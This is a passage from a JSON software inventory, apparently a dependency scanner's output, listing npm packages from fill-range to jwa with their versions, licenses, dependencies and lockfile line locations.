"AnalyzedBy": "npm" }, { "ID": "fill-range@7.1.1", "Name": "fill-range", "Identifier": { "PURL": "pkg:npm/fill-range@7.1.1", "UID": "bf8fed27fdd47afb" }, "Version": "7.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "to-regex-range@5.0.1" ], "Locations": [ { "StartLine": 5447, "EndLine": 5458 } ], "AnalyzedBy": "npm" }, { "ID": "finalhandler@1.3.2", "Name": "finalhandler", "Identifier": { "PURL": "pkg:npm/finalhandler@1.3.2", "UID": "2e13a9639c583949" }, "Version": "1.3.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "debug@2.6.9", "encodeurl@2.0.0", "escape-html@1.0.3", "on-finished@2.4.1", "parseurl@1.3.3", "statuses@2.0.2", "unpipe@1.0.0" ], "Locations": [ { "StartLine": 5459, "EndLine": 5476 } ], "AnalyzedBy": "npm" }, { "ID": "find-up@4.1.0", "Name": "find-up", "Identifier": { "PURL": "pkg:npm/find-up@4.1.0", "UID": "fb251213c34e388d" }, "Version": "4.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "locate-path@5.0.0", "path-exists@4.0.0" ], "Locations": [ { "StartLine": 8181, "EndLine": 8193 } ], "AnalyzedBy": "npm" }, { "ID": "firebase-admin@12.7.0", "Name": "firebase-admin", "Identifier": { "PURL": "pkg:npm/firebase-admin@12.7.0", "UID": "a841b26d1c63867d" }, "Version": "12.7.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@fastify/busboy@3.2.0", "@firebase/database-compat@1.0.8", "@firebase/database-types@1.0.5", "@google-cloud/firestore@7.11.6", "@google-cloud/storage@7.19.0", "@types/node@22.19.17", "farmhash-modern@1.1.0", "jsonwebtoken@9.0.3", "jwks-rsa@3.2.2", "node-forge@1.4.0", "uuid@10.0.0" ], "Locations": [ { "StartLine": 5509, "EndLine": 5532 } ], "AnalyzedBy": "npm" }, { "ID": "follow-redirects@1.16.0", "Name": "follow-redirects", "Identifier": { "PURL": "pkg:npm/follow-redirects@1.16.0", "UID": "64b3624e504d2367" }, "Version": "1.16.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5564, "EndLine": 5583 } ], "AnalyzedBy": "npm" }, { "ID": "fontkit@2.0.4", "Name": "fontkit", "Identifier": { "PURL": "pkg:npm/fontkit@2.0.4", "UID": "a3e0aba04e40ec9c" }, "Version": "2.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@swc/helpers@0.5.21", "brotli@1.3.3", "clone@2.1.2", "dfa@1.2.0", "fast-deep-equal@3.1.3", "restructure@3.0.2", "tiny-inflate@1.0.3", "unicode-properties@1.4.1", "unicode-trie@2.0.0" ], "Locations": [ { "StartLine": 5584, "EndLine": 5600 } ], "AnalyzedBy": "npm" }, { "ID": "foreground-child@3.3.1", "Name": "foreground-child", "Identifier": { "PURL": "pkg:npm/foreground-child@3.3.1", "UID": "1f8e9e326e60d121" }, "Version": "3.3.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "cross-spawn@7.0.6", "signal-exit@4.1.0" ], "Locations": [ { "StartLine": 5601, "EndLine": 5616 } ], "AnalyzedBy": "npm" }, { "ID": "form-data@2.5.5", "Name": "form-data", "Identifier": { "PURL": "pkg:npm/form-data@2.5.5", "UID": "a401bc09d601bf4c" }, "Version": "2.5.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "asynckit@0.4.0", "combined-stream@1.0.8", "es-set-tostringtag@2.1.0", "hasown@2.0.3", "mime-types@2.1.35", "safe-buffer@5.2.1" ], "Locations": [ { "StartLine": 5617, "EndLine": 5634 } ], "AnalyzedBy": "npm" }, { "ID": "form-data@4.0.5", "Name": "form-data", "Identifier": { "PURL": "pkg:npm/form-data@4.0.5", "UID": "5173e1b68c4a6a28" }, "Version": "4.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "asynckit@0.4.0", "combined-stream@1.0.8", "es-set-tostringtag@2.1.0", "hasown@2.0.3", "mime-types@2.1.35" ], "Locations": [ { "StartLine": 3142, "EndLine": 3158 }, { "StartLine": 3558, "EndLine": 3573 }, { "StartLine": 9412, "EndLine": 9428 } ], "AnalyzedBy": "npm" }, { "ID": "forwarded@0.2.0", "Name": "forwarded", "Identifier": { "PURL": "pkg:npm/forwarded@0.2.0", "UID": "a89b18e52cb3a030" }, "Version": "0.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5653, "EndLine": 5661 } ], "AnalyzedBy": "npm" }, { "ID": "fraction.js@5.3.4", "Name": "fraction.js", "Identifier": { "PURL": "pkg:npm/fraction.js@5.3.4", "UID": "9d49315440b3e412" }, "Version": "5.3.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5662, "EndLine": 5674 } ], "AnalyzedBy": "npm" }, { "ID": "fresh@0.5.2", "Name": "fresh", "Identifier": { "PURL": "pkg:npm/fresh@0.5.2", "UID": "89ce7e0aad007afc" }, "Version": "0.5.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5675, "EndLine": 5683 } ], "AnalyzedBy": "npm" }, { "ID": "fsevents@2.3.3", "Name": "fsevents", "Identifier": { "PURL": "pkg:npm/fsevents@2.3.3", "UID": "a1dde705c46ac6a5" }, "Version": "2.3.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5691, "EndLine": 5704 } ], "AnalyzedBy": "npm" }, { "ID": "function-bind@1.1.2", "Name": "function-bind", "Identifier": { "PURL": "pkg:npm/function-bind@1.1.2", "UID": "88555af697083af6" }, "Version": "1.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5705, "EndLine": 5713 } ], "AnalyzedBy": "npm" }, { "ID": "functional-red-black-tree@1.0.1", "Name": "functional-red-black-tree", "Identifier": { "PURL": "pkg:npm/functional-red-black-tree@1.0.1", "UID": "99384682ed2c98b0" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5714, "EndLine": 5720 } ], "AnalyzedBy": "npm" }, { "ID": "gaxios@6.7.1", "Name": "gaxios", "Identifier": { "PURL": "pkg:npm/gaxios@6.7.1", "UID": "9ab4e83fa01c4b31" }, "Version": "6.7.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "extend@3.0.2", "https-proxy-agent@7.0.6", "is-stream@2.0.1", "node-fetch@2.7.0", "uuid@9.0.1" ], "Locations": [ { "StartLine": 5721, "EndLine": 5737 } ], "AnalyzedBy": "npm" }, { "ID": "gcp-metadata@6.1.1", "Name": "gcp-metadata", "Identifier": { "PURL": "pkg:npm/gcp-metadata@6.1.1", "UID": "5b181af1713a7d43" }, "Version": "6.1.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "gaxios@6.7.1", "google-logging-utils@0.0.2", "json-bigint@1.0.0" ], "Locations": [ { "StartLine": 5753, "EndLine": 5767 } ], "AnalyzedBy": "npm" }, { "ID": "get-caller-file@2.0.5", "Name": "get-caller-file", "Identifier": { "PURL": "pkg:npm/get-caller-file@2.0.5", "UID": "16f7eb6b6acd0187" }, "Version": "2.0.5", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5768, "EndLine": 5776 } ], "AnalyzedBy": "npm" }, { "ID": "get-intrinsic@1.3.0", "Name": "get-intrinsic", "Identifier": { "PURL": "pkg:npm/get-intrinsic@1.3.0", "UID": "73d732b26f3ec0be" }, "Version": "1.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bind-apply-helpers@1.0.2", "es-define-property@1.0.1", "es-errors@1.3.0", "es-object-atoms@1.1.1", "function-bind@1.1.2", "get-proto@1.0.1", "gopd@1.2.0", "has-symbols@1.1.0", "hasown@2.0.3", "math-intrinsics@1.1.0" ], "Locations": [ { "StartLine": 5787, "EndLine": 5810 } ], "AnalyzedBy": "npm" }, { "ID": "get-proto@1.0.1", "Name": "get-proto", "Identifier": { "PURL": "pkg:npm/get-proto@1.0.1", "UID": "93991544cff2553a" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "dunder-proto@1.0.1", "es-object-atoms@1.1.1" ], "Locations": [ { "StartLine": 5811, "EndLine": 5823 } ], "AnalyzedBy": "npm" }, { "ID": "glob@10.5.0", "Name": "glob", "Identifier": { "PURL": "pkg:npm/glob@10.5.0", "UID": "51f02481b9ac79d9" }, "Version": "10.5.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "foreground-child@3.3.1", "jackspeak@3.4.3", "minimatch@9.0.9", "minipass@7.1.3", "package-json-from-dist@1.0.1", "path-scurry@1.11.1" ], "Locations": [ { "StartLine": 6511, "EndLine": 6531 } ], "AnalyzedBy": "npm" }, { "ID": "glob-parent@5.1.2", "Name": "glob-parent", "Identifier": { "PURL": "pkg:npm/glob-parent@5.1.2", "UID": "f0da80437ab40507" }, "Version": "5.1.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-glob@4.0.3" ], "Locations": [ { "StartLine": 3996, "EndLine": 4007 }, { "StartLine": 5336, "EndLine": 5347 } ], "AnalyzedBy": "npm" }, { "ID": "glob-parent@6.0.2", "Name": "glob-parent", "Identifier": { "PURL": "pkg:npm/glob-parent@6.0.2", "UID": "d710a8fb4a823621" }, "Version": "6.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-glob@4.0.3" ], "Locations": [ { "StartLine": 5859, "EndLine": 5870 } ], "AnalyzedBy": "npm" }, { "ID": "google-auth-library@9.15.1", "Name": "google-auth-library", "Identifier": { "PURL": "pkg:npm/google-auth-library@9.15.1", "UID": "4c9e7d0805d070b7" }, "Version": "9.15.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "base64-js@1.5.1", "ecdsa-sig-formatter@1.0.11", "gaxios@6.7.1", "gcp-metadata@6.1.1", "gtoken@7.1.0", "jws@4.0.1" ], "Locations": [ { "StartLine": 5887, "EndLine": 5904 } ], "AnalyzedBy": "npm" }, { "ID": "google-gax@4.6.1", "Name": "google-gax", "Identifier": { "PURL": "pkg:npm/google-gax@4.6.1", "UID": "f07ef8c106223e11" }, "Version": "4.6.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@grpc/grpc-js@1.14.3", "@grpc/proto-loader@0.7.15", "@types/long@4.0.2", "abort-controller@3.0.0", "duplexify@4.1.3", "google-auth-library@9.15.1", "node-fetch@2.7.0", "object-hash@3.0.0", "proto3-json-serializer@2.0.2", "protobufjs@7.5.6", "retry-request@7.0.2", "uuid@9.0.1" ], "Locations": [ { "StartLine": 5905, "EndLine": 5928 } ], "AnalyzedBy": "npm" }, { "ID": "google-logging-utils@0.0.2", "Name": "google-logging-utils", "Identifier": { "PURL": "pkg:npm/google-logging-utils@0.0.2", "UID": "b9849dddd25ec441" }, "Version": "0.0.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5944, "EndLine": 5953 } ], "AnalyzedBy": "npm" }, { "ID": "gopd@1.2.0", "Name": "gopd", "Identifier": { "PURL": "pkg:npm/gopd@1.2.0", "UID": "698a11c181039168" }, "Version": "1.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5954, "EndLine": 5965 } ], "AnalyzedBy": "npm" }, { "ID": "graceful-fs@4.2.11", "Name": "graceful-fs", "Identifier": { "PURL": "pkg:npm/graceful-fs@4.2.11", "UID": "da434b23993c8e0" }, "Version": "4.2.11", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5966, "EndLine": 5971 } ], "AnalyzedBy": "npm" }, { "ID": "gtoken@7.1.0", "Name": "gtoken", "Identifier": { "PURL": "pkg:npm/gtoken@7.1.0", "UID": "158369d345c14edd" }, "Version": "7.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "gaxios@6.7.1", "jws@4.0.1" ], "Locations": [ { "StartLine": 5979, "EndLine": 5992 } ], "AnalyzedBy": "npm" }, { "ID": "has-symbols@1.1.0", "Name": "has-symbols", "Identifier": { "PURL": "pkg:npm/has-symbols@1.1.0", "UID": "bbb37362f5995752" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6003, "EndLine": 6014 } ], "AnalyzedBy": "npm" }, { "ID": "has-tostringtag@1.0.2", "Name": "has-tostringtag", "Identifier": { "PURL": "pkg:npm/has-tostringtag@1.0.2", "UID": "f044e50ba76299ff" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "has-symbols@1.1.0" ], "Locations": [ { "StartLine": 6015, "EndLine": 6029 } ], "AnalyzedBy": "npm" }, { "ID": "hasown@2.0.3", "Name": "hasown", "Identifier": { "PURL": "pkg:npm/hasown@2.0.3", "UID": "b902d17f2e19d092" }, "Version": "2.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "function-bind@1.1.2" ], "Locations": [ { "StartLine": 6030, "EndLine": 6041 } ], "AnalyzedBy": "npm" }, { "ID": "helmet@7.2.0", "Name": "helmet", "Identifier": { "PURL": "pkg:npm/helmet@7.2.0", "UID": "b57ef8d74bddd68" }, "Version": "7.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6042, "EndLine": 6050 } ], "AnalyzedBy": "npm" }, { "ID": "hsl-to-hex@1.0.0", "Name": "hsl-to-hex", "Identifier": { "PURL": "pkg:npm/hsl-to-hex@1.0.0", "UID": "da2be6266cacec4f" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "hsl-to-rgb-for-reals@1.1.1" ], "Locations": [ { "StartLine": 6051, "EndLine": 6059 } ], "AnalyzedBy": "npm" }, { "ID": "hsl-to-rgb-for-reals@1.1.1", "Name": "hsl-to-rgb-for-reals", "Identifier": { "PURL": "pkg:npm/hsl-to-rgb-for-reals@1.1.1", "UID": "40260101f741b38d" }, "Version": "1.1.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6060, "EndLine": 6065 } ], "AnalyzedBy": "npm" }, { "ID": "html-entities@2.6.0", "Name": "html-entities", "Identifier": { "PURL": "pkg:npm/html-entities@2.6.0", "UID": "d4f1310234c87f72" }, "Version": "2.6.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6066, "EndLine": 6082 } ], "AnalyzedBy": "npm" }, { "ID": "html-to-text@9.0.5", "Name": "html-to-text", "Identifier": { "PURL": "pkg:npm/html-to-text@9.0.5", "UID": "d1455c518f88c3d4" }, "Version": "9.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@selderee/plugin-htmlparser2@0.11.0", "deepmerge@4.3.1", "dom-serializer@2.0.0", "htmlparser2@8.0.2", "selderee@0.11.0" ], "Locations": [ { "StartLine": 6083, "EndLine": 6098 } ], "AnalyzedBy": "npm" }, { "ID": "htmlparser2@8.0.2", "Name": "htmlparser2", "Identifier": { "PURL": "pkg:npm/htmlparser2@8.0.2", "UID": "929954ad77733e6f" }, "Version": "8.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "domelementtype@2.3.0", "domhandler@5.0.3", "domutils@3.2.2", "entities@4.5.0" ], "Locations": [ { "StartLine": 6099, "EndLine": 6117 } ], "AnalyzedBy": "npm" }, { "ID": "http-errors@2.0.1", "Name": "http-errors", "Identifier": { "PURL": "pkg:npm/http-errors@2.0.1", "UID": "5d6267d8daa5c905" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "depd@2.0.0", "inherits@2.0.4", "setprototypeof@1.2.0", "statuses@2.0.2", "toidentifier@1.0.1" ], "Locations": [ { "StartLine": 6118, "EndLine": 6137 } ], "AnalyzedBy": "npm" }, { "ID": "http-parser-js@0.5.10", "Name": "http-parser-js", "Identifier": { "PURL": "pkg:npm/http-parser-js@0.5.10", "UID": "bc7904be24d8a80b" }, "Version": "0.5.10", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6138, "EndLine": 6143 } ], "AnalyzedBy": "npm" }, { "ID": "http-proxy-agent@5.0.0", "Name": "http-proxy-agent", "Identifier": { "PURL": "pkg:npm/http-proxy-agent@5.0.0", "UID": "e94b9d1cfcd41abb" }, "Version": "5.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@tootallnate/once@2.0.0", "agent-base@6.0.2", "debug@4.4.3" ], "Locations": [ { "StartLine": 6144, "EndLine": 6158 } ], "AnalyzedBy": "npm" }, { "ID": "https-proxy-agent@5.0.1", "Name": "https-proxy-agent", "Identifier": { "PURL": "pkg:npm/https-proxy-agent@5.0.1", "UID": "a74521fd76ce1bc6" }, "Version": "5.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "agent-base@6.0.2", "debug@4.4.3" ], "Locations": [ { "StartLine": 9565, "EndLine": 9578 }, { "StartLine": 10031, "EndLine": 10043 } ], "AnalyzedBy": "npm" }, { "ID": "https-proxy-agent@7.0.6", "Name": "https-proxy-agent", "Identifier": { "PURL": "pkg:npm/https-proxy-agent@7.0.6", "UID": "4db6d8bbe1c1c384" }, "Version": "7.0.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "agent-base@7.1.4", "debug@4.4.3" ], "Locations": [ { "StartLine": 6172, "EndLine": 6185 } ], "AnalyzedBy": "npm" }, { "ID": "hyphen@1.14.1", "Name": "hyphen", "Identifier": { "PURL": "pkg:npm/hyphen@1.14.1", "UID": "629c3e393f280325" }, "Version": "1.14.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6196, "EndLine": 6201 } ], "AnalyzedBy": "npm" }, { "ID": "iconv-lite@0.4.24", "Name": "iconv-lite", "Identifier": { "PURL": "pkg:npm/iconv-lite@0.4.24", "UID": "b40a5eaa091755e7" }, "Version": "0.4.24", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "safer-buffer@2.1.2" ], "Locations": [ { "StartLine": 6202, "EndLine": 6213 } ], "AnalyzedBy": "npm" }, { "ID": "inherits@2.0.4", "Name": "inherits", "Identifier": { "PURL": "pkg:npm/inherits@2.0.4", "UID": "42acb560b77191d9" }, "Version": "2.0.4", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6263, "EndLine": 6268 } ], "AnalyzedBy": "npm" }, { "ID": "ini@1.3.8", "Name": "ini", "Identifier": { "PURL": "pkg:npm/ini@1.3.8", "UID": "faf0ff41f7d40c12" }, "Version": "1.3.8", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6269, "EndLine": 6274 } ], "AnalyzedBy": "npm" }, { "ID": "internmap@2.0.3", "Name": "internmap", "Identifier": { "PURL": "pkg:npm/internmap@2.0.3", "UID": "7c69e1420aee960d" }, "Version": "2.0.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6275, "EndLine": 6283 } ], "AnalyzedBy": "npm" }, { "ID": "ioredis@5.10.1", "Name": "ioredis", "Identifier": { "PURL": "pkg:npm/ioredis@5.10.1", "UID": "cbba7c0438dd0490" }, "Version": "5.10.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@ioredis/commands@1.5.1", "cluster-key-slot@1.1.2", "debug@4.4.3", "denque@2.1.0", "lodash.defaults@4.2.0", "lodash.isarguments@3.1.0", "redis-errors@1.2.0", "redis-parser@3.0.0", "standard-as-callback@2.1.0" ], "Locations": [ { "StartLine": 6284, "EndLine": 6307 } ], "AnalyzedBy": "npm" }, { "ID": "ip-address@10.2.0", "Name": "ip-address", "Identifier": { "PURL": "pkg:npm/ip-address@10.2.0", "UID": "274c04694982a172" }, "Version": "10.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6308, "EndLine": 6316 } ], "AnalyzedBy": "npm" }, { "ID": "ipaddr.js@1.9.1", "Name": "ipaddr.js", "Identifier": { "PURL": "pkg:npm/ipaddr.js@1.9.1", "UID": "39675c39452a1867" }, "Version": "1.9.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6317, "EndLine": 6325 } ], "AnalyzedBy": "npm" }, { "ID": "is-arrayish@0.3.4", "Name": "is-arrayish", "Identifier": { "PURL": "pkg:npm/is-arrayish@0.3.4", "UID": "e5037f6ef4f0bf3d" }, "Version": "0.3.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6326, "EndLine": 6331 } ], "AnalyzedBy": "npm" }, { "ID": "is-binary-path@2.1.0", "Name": "is-binary-path", "Identifier": { "PURL": "pkg:npm/is-binary-path@2.1.0", "UID": "2079e081bc2c9f55" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "binary-extensions@2.3.0" ], "Locations": [ { "StartLine": 6332, "EndLine": 6343 } ], "AnalyzedBy": "npm" }, { "ID": "is-core-module@2.16.1", "Name": "is-core-module", "Identifier": { "PURL": "pkg:npm/is-core-module@2.16.1", "UID": "194bb487a7d837d3" }, "Version": "2.16.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "hasown@2.0.3" ], "Locations": [ { "StartLine": 6344, "EndLine": 6358 } ], "AnalyzedBy": "npm" }, { "ID": "is-extglob@2.1.1", "Name": "is-extglob", "Identifier": { "PURL": "pkg:npm/is-extglob@2.1.1", "UID": "f7b62e701109bed3" }, "Version": "2.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6359, "EndLine": 6367 } ], "AnalyzedBy": "npm" }, { "ID": "is-fullwidth-code-point@3.0.0", "Name": "is-fullwidth-code-point", "Identifier": { "PURL": "pkg:npm/is-fullwidth-code-point@3.0.0", "UID": "b21f06b2855a0e40" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6368, "EndLine": 6376 } ], "AnalyzedBy": "npm" }, { "ID": "is-glob@4.0.3", "Name": "is-glob", "Identifier": { "PURL": "pkg:npm/is-glob@4.0.3", "UID": "bd4ded40b3143211" }, "Version": "4.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-extglob@2.1.1" ], "Locations": [ { "StartLine": 6377, "EndLine": 6388 } ], "AnalyzedBy": "npm" }, { "ID": "is-number@7.0.0", "Name": "is-number", "Identifier": { "PURL": "pkg:npm/is-number@7.0.0", "UID": "ff75f44ff8882f82" }, "Version": "7.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6389, "EndLine": 6397 } ], "AnalyzedBy": "npm" }, { "ID": "is-stream@2.0.1", "Name": "is-stream", "Identifier": { "PURL": "pkg:npm/is-stream@2.0.1", "UID": "11bf08ec7921745d" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6408, "EndLine": 6420 } ], "AnalyzedBy": "npm" }, { "ID": "is-url@1.2.4", "Name": "is-url", "Identifier": { "PURL": "pkg:npm/is-url@1.2.4", "UID": "fc8e05c4ae2d8462" }, "Version": "1.2.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6421, "EndLine": 6426 } ], "AnalyzedBy": "npm" }, { "ID": "isarray@1.0.0", "Name": "isarray", "Identifier": { "PURL": "pkg:npm/isarray@1.0.0", "UID": "9f6755f2db52c2e0" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6427, "EndLine": 6432 } ], "AnalyzedBy": "npm" }, { "ID": "isexe@2.0.0", "Name": "isexe", "Identifier": { "PURL": "pkg:npm/isexe@2.0.0", "UID": "ca59f4eac09e64d2" }, "Version": "2.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6433, "EndLine": 6438 } ], "AnalyzedBy": "npm" }, { "ID": "jackspeak@3.4.3", "Name": "jackspeak", "Identifier": { "PURL": "pkg:npm/jackspeak@3.4.3", "UID": "5ead3b3accdc4793" }, "Version": "3.4.3", "Licenses": [ "BlueOak-1.0.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@isaacs/cliui@8.0.2", "@pkgjs/parseargs@0.11.0" ], "Locations": [ { "StartLine": 6439, "EndLine": 6453 } ], "AnalyzedBy": "npm" }, { "ID": "jay-peg@1.1.1", "Name": "jay-peg", "Identifier": { "PURL": "pkg:npm/jay-peg@1.1.1", "UID": "1071af202f0b7732" }, "Version": "1.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "restructure@3.0.2" ], "Locations": [ { "StartLine": 6454, "EndLine": 6462 } ], "AnalyzedBy": "npm" }, { "ID": "jiti@1.21.7", "Name": "jiti", "Identifier": { "PURL": "pkg:npm/jiti@1.21.7", "UID": "a5e81f7303fe9af7" }, "Version": "1.21.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6463, "EndLine": 6471 } ], "AnalyzedBy": "npm" }, { "ID": "jose@4.15.9", "Name": "jose", "Identifier": { "PURL": "pkg:npm/jose@4.15.9", "UID": "41aef2651f77b27e" }, "Version": "4.15.9", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6472, "EndLine": 6480 } ], "AnalyzedBy": "npm" }, { "ID": "js-beautify@1.15.4", "Name": "js-beautify", "Identifier": { "PURL": "pkg:npm/js-beautify@1.15.4", "UID": "bd071ff93589f502" }, "Version": "1.15.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "config-chain@1.1.13", "editorconfig@1.0.7", "glob@10.5.0", "js-cookie@3.0.5", "nopt@7.2.1" ], "Locations": [ { "StartLine": 6481, "EndLine": 6501 } ], "AnalyzedBy": "npm" }, { "ID": "js-cookie@3.0.5", "Name": "js-cookie", "Identifier": { "PURL": "pkg:npm/js-cookie@3.0.5", "UID": "c87934922ce49ae" }, "Version": "3.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6547, "EndLine": 6555 } ], "AnalyzedBy": "npm" }, { "ID": "js-md5@0.8.3", "Name": "js-md5", "Identifier": { "PURL": "pkg:npm/js-md5@0.8.3", "UID": "ddc387a2fb963626" }, "Version": "0.8.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6556, "EndLine": 6561 } ], "AnalyzedBy": "npm" }, { "ID": "js-tokens@4.0.0", "Name": "js-tokens", "Identifier": { "PURL": "pkg:npm/js-tokens@4.0.0", "UID": "ca817ce88dc3dc01" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6562, "EndLine": 6567 } ], "AnalyzedBy": "npm" }, { "ID": "json-bigint@1.0.0", "Name": "json-bigint", "Identifier": { "PURL": "pkg:npm/json-bigint@1.0.0", "UID": "c449dec1ac10502f" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "bignumber.js@9.3.1" ], "Locations": [ { "StartLine": 6581, "EndLine": 6590 } ], "AnalyzedBy": "npm" }, { "ID": "jsonwebtoken@9.0.3", "Name": "jsonwebtoken", "Identifier": { "PURL": "pkg:npm/jsonwebtoken@9.0.3", "UID": "6b1e2e8917a2bc0a" }, "Version": "9.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "jws@4.0.1", "lodash.includes@4.3.0", "lodash.isboolean@3.0.3", "lodash.isinteger@4.0.4", "lodash.isnumber@3.0.3", "lodash.isplainobject@4.0.6", "lodash.isstring@4.0.1", "lodash.once@4.1.1", "ms@2.1.3", "semver@7.7.4" ], "Locations": [ { "StartLine": 6612, "EndLine": 6633 } ], "AnalyzedBy": "npm" }, { "ID": "jwa@2.0.1", "Name": "jwa", "Identifier": { "PURL": "pkg:npm/jwa@2.0.1", "UID": "f72d9abf5d3b3bfe" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "buffer-equal-constant-time@1.0.1", 